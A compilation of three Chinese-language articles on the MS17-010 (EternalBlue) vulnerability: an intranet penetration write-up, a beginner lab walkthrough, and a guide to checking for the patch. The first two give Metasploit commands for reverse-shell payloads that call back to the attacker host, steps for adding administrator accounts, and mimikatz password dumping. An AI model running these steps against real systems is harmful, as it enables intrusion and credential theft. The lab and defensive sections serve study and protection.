⑴ 內網滲透之ms17-010
在內網滲透時,通常掛上代理後。在內網首先會打啵ms17-010。在實戰中,使用msf的ms17-010模塊,數次沒有反彈成功。基於此,到底如何成功利用ms17-010
在msf成功接收session之後,添加路由
然後使用ms17-010相關的模塊進行探測是否存在該漏洞。
嘗試利用
LHOST配置為公網IP
可以看到success。漏洞是可以利用的,但始終沒有session。不知道什麼原因。
參考資料: 利用公網Msf+MS17010跨網段攻擊內網
筆者在本地搭建環境,也是同樣的結果。嘗試更改payload為
bind_tcp攻擊者去連接,容易被防火牆和殺毒發現
可以成功生成session,但並不穩定,且在run的過程中非常容易導致本來的session died
在實際使用msf的ms17_010_eternalblue模塊時,筆者觀察到有幾個弊端。
1.session 很容易died
2.ms17_010_eternalblue模塊利用起來非常耗時
3.無法利用成功
有大佬推薦使用原始的fb.py。但配置起來感覺麻煩一些。
所以。筆者從i春秋上找到一個輕便的方程式漏洞利用工具。
參考資料: 萌新初試MS17-010方程式漏洞
工具使用起來很簡單。只需要msfvenom生成一個x64或x86的dll文件,替換該工具下的x64.dll或x86.dll 。再依次點擊Eternalblue、Doublepulsar 的Attack即可。在Attack的時候,調用x64.dll動態鏈接庫,反彈到公網IP。原理和fb.py一樣。
筆者通過ew代理進內網後,在跳板機上上傳了方程式漏洞利用工具、網安永恆之藍檢測工具。兩者結合,威力巨大。成功利用ms17-010
對於windows server 2008 ,msfvenom生成x64.dll文件
msf配置
將該x64.dll替換到方程式利用工具下面。
只需要更換目標的IP,就可以獲取session。
對於windows server 2003 ,msfvenom生成x86.dll文件
msf配置
進一步利用的一些命令
實際測試發現這種session非常穩定。不會輕易go die
實際測試server 2003的ms17-010時,有時候多次執行後msf就接收不到session,而且ms17-010利用時,脆弱的server 2003非常容易藍屏。
所以筆者選擇一種穩定可靠一些的辦法。
先通過ms17_010_commend模塊執行系統命令添加用戶至管理員。再指定SMBPass和SMBUser來建立windows可訪問命名管道[accessible named pipe]
參考資料 Metasploit 「永恆之藍」兩種模塊的利弊
system的許可權可以直接激活guest用戶添加管理員組。
注意:使用ms17_010_psexec需要指定管理員的用戶名、密碼,否則沒有session
同樣的操作,載入mimikatz,讀取管理員密碼。
⑵ ms17010漏洞的簡單利用
(第一次在發表文章,沒啥經驗,分享一些學習經驗。大佬們多多包涵,也希望大家能夠指出我的錯誤。)
靶機:windows7 x64 IP:192.168.1.5
攻擊機:Kali Rolling (2019.3) x64 IP:192.168.1.3
兩台主機在同一網段內;win7關閉防火牆並且開啟445埠。
1、使用ipconfig/ifconfig分別查看win7和kali的ip。
2、打開msf工具
每次開啟都會有不同的界面
3、使用search命令搜索ms17_010
4、選擇模塊和設置條件
使用use來選擇第三個模塊,可以直接 use 2,也可以打全
然後用set來設置靶機IP set rhost 192.168.1.5
設置本機IP set lhost 192.168.1.3
設置監聽埠 set lport 8888 不設置則默認4444埠
設置payload set payload windows/x64/meterpreter/reverse_tcp
還有另外一個payload能用於本實驗,具體可以 show payloads 查看
最後,可以使用show options檢查所有信息
5、開始滲透 run
稍等片刻 看到win則成功創建會話
6、成功之後,可以開啟Windows7的攝像頭,截圖等等
具體可以用help查看
1、關閉445埠
2、打開防火牆,安裝安全軟體
3、安裝對應補丁,這里就不放鏈接了
關閉445埠的方法:
1)打開控制面板----Windows防火牆----高級設置
2)點擊新建規則,設置埠號的規則並且命名(如圖)
msf工具雖然強大,但只能用於已知的並且已提交模塊的漏洞。要理解漏洞原理,理解如何使用漏洞,甚至自己挖洞才能做到真正的去攻擊。而不是簡單的使用工具use和set。
⑶ 怎麼看自己電腦是否安裝 windows補丁 ms17010
檢查電腦是否安裝了針對MS17-010漏洞的補丁,可以藉助一些安全軟體來實現。比如,360安全衛士和電腦管家這類工具,在它們的漏洞修復功能中,可以查看本機安裝漏洞的詳細信息。通過這些工具,用戶能夠一目瞭然地了解系統當前的補丁狀態。
具體操作步驟如下:首先,打開360安全衛士或電腦管家。然後,點擊進入「漏洞修復」或「系統修復」模塊。在這里,軟體會自動檢測系統漏洞並列出所有已安裝的補丁。用戶可以查看這些補丁的詳細信息,包括補丁編號、適用范圍以及安裝日期等。如果發現有MS17-010漏洞相關的補丁,則說明系統已經得到了有效的防護。反之,如果沒有該補丁,則需要及時安裝以避免安全風險。
值得注意的是,不同版本的360安全衛士或電腦管家可能在界面布局和功能名稱上有所不同。但總體來說,它們都提供了類似的漏洞檢測和修復功能。因此,即使遇到不太熟悉的操作界面,也可以通過仔細閱讀軟體的幫助文檔或在線搜索相關教程來解決。
此外,除了利用第三方軟體進行檢查,還可以參考微軟官方發布的安全公告和補丁下載鏈接。例如,在微軟的安全公告頁面上,可以找到MS17-010漏洞的相關信息,包括受影響的產品列表、漏洞描述以及官方發布的補丁文件。用戶可以根據這些信息判斷自己的系統是否已經安裝了相應的補丁。
總之,通過上述方法,用戶可以方便地了解自己電腦是否安裝了MS17-010漏洞的補丁。同時,定期進行系統更新和安全檢查也是保護電腦免受惡意攻擊的重要措施。